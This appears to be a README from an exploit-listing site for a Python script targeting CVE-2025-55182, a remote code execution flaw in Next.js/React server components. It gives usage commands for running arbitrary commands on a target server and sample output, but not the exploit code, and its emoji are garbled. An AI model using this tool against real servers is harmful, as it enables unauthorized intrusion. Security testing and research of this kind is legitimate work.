## https://sploitus.com/exploit?id=57943B09-0448-5A84-998B-D2A0DDB0E5D0
# CVE-2025-55182 Python Exploit
Python 3 script that can be used to demonstrate **CVE-2025-55182**. It exploits a server-side JavaScript injection vulnerability in Next.js/React applications, allowing **remote code execution** via malformed multipart form data.
> โ ๏ธ For educational and authorized testing purposes only.
---
## ๐ Usage
### ๐ง Prerequisites
```bash
pip install requests
```
### Example Usage
```bash
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
```
### Options
-u Target domain or IP with protocol - http://localhost:3000
-c Command to execute on the server - id
### Sample Output
```bash
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)
```
## Reference
https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/